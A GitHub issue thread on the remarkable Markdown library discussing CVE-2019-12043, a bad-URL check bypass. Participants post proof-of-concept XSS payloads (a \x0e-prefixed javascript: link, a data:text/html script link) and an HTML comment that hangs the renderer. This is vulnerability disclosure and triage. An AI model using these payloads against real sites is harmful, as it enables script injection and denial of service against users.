### ISSUE TITLE
[Security] bad url bypass, could lead to XSS

### ISSUE THREAD

**Issue by trichimtrich** [jonschlinkert/remarkable#332]
Hi, check out this reported issue
https://github.com/jonschlinkert/remarkable/issues/227

Im able to bypass the bad url check, implemented here
https://github.com/jonschlinkert/remarkable/blob/master/lib/parser_inline.js#L146

```javascript
var Remarkable = require('remarkable');
var md = new Remarkable();

console.log(md.render(`# Remarkable rulezz!
[click me](\x0ejavascript:alert(1))
`));
```

It will generate output like this
```
<h1>Remarkable rulezz!</h1>
<p><a href=" javascript:alert(1)">click me</a></p>
```

Which could pop up an alert when user clicks into it.

Fix: maybe we can strip unprintable character around the url scheme?

**Comment by jonschlinkert** [comment]
Thanks for the PR. Would you want to do a pull request?

**Comment by reintroducing** [comment]
This triggered a GitHub security vulnerability notification in one of my repos today. Any chance that this can get fixed?

**Comment by rikoe** [comment]
Is there any update on this high severity vulnerability? It would be great if this could be fixed ASAP.

![image](https://user-images.githubusercontent.com/3295115/61280177-56ddc280-a7af-11e9-8a06-93866c31fd5d.png)

**Comment by sundowndev** [comment]
Still not fixed. But why [this snippet](https://jonschlinkert.github.io/remarkable/demo/#md64=JTdCJTIyc291cmNlJTIyOiUyMiMlMjBSZW1hcmthYmxlJTIwcnVsZXp6ISU1Q24lNUNuJTVCY2xpY2slMjBtZSU1RCglNUMlNUN4MGVqYXZhc2NyaXB0OmFsZXJ0KDEpKSU1Q24lNUNuJTVCeHNzJTVEKGRhdGE6dGV4dC9odG1sLCUzQ3NjcmlwdCUzRWFsZXJ0KDEpJTNDL3NjcmlwdCUzRSklMjIsJTIyZGVmYXVsdHMlMjI6JTdCJTIyaHRtbCUyMjpmYWxzZSwlMjJ4aHRtbE91dCUyMjpmYWxzZSwlMjJicmVha3MlMjI6ZmFsc2UsJTIybGFuZ1ByZWZpeCUyMjolMjJsYW5ndWFnZS0lMjIsJTIybGlua2lmeSUyMjp0cnVlLCUyMmxpbmtUYXJnZXQlMjI6JTIyJTIyLCUyMnR5cG9ncmFwaGVyJTIyOnRydWUsJTIyX2hpZ2hsaWdodCUyMjp0cnVlLCUyMl9zdHJpY3QlMjI6ZmFsc2UsJTIyX3ZpZXclMjI6JTIyaHRtbCUyMiU3RCU3RA==) does not produce the expected issue ?

Tried using @trichimtrich's code and #227. None of them work on Firefox.

```
# Remarkable rulezz!

[click me](\x0ejavascript:alert(1))

[xss](data:text/html,<script>alert(1)</script>)
```

**Comment by rikoe** [comment]
The xss one works for me in Safari but not in Chrome. There is likely something in Chrome preventing such an attack?

![image](https://user-images.githubusercontent.com/3295115/61376598-646f7700-a899-11e9-8462-a1af4d64d1d4.png)

The first one doesn't work for me on the demo page, because it is turned into the URL https://jonschlinkert.github.io/x0ejavascript:alert(1) which then returns a 404 (not sure why). I am therefore not sure if it can be proved through the demo page...

**Comment by rikoe** [comment]
@sundowndev there are two CVEs open currently:
* [CVE-2019-12041][1] which references #331 
* [CVE-2019-12043][2] which references #332 (this issue)

Both these issues were raised based on calling `md.render` from JavaScript, so that should be the way to test it I think.

I think I was able to replicate both these issues by using:

```
# Remarkable rulezz!
[xss](data:text/html,<script>alert(1)</script>)
<a>z</a><!--aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa--->
```
The comment line makes the demo page hang if I turn the "html" flag on.

[1]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12041
[2]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12043
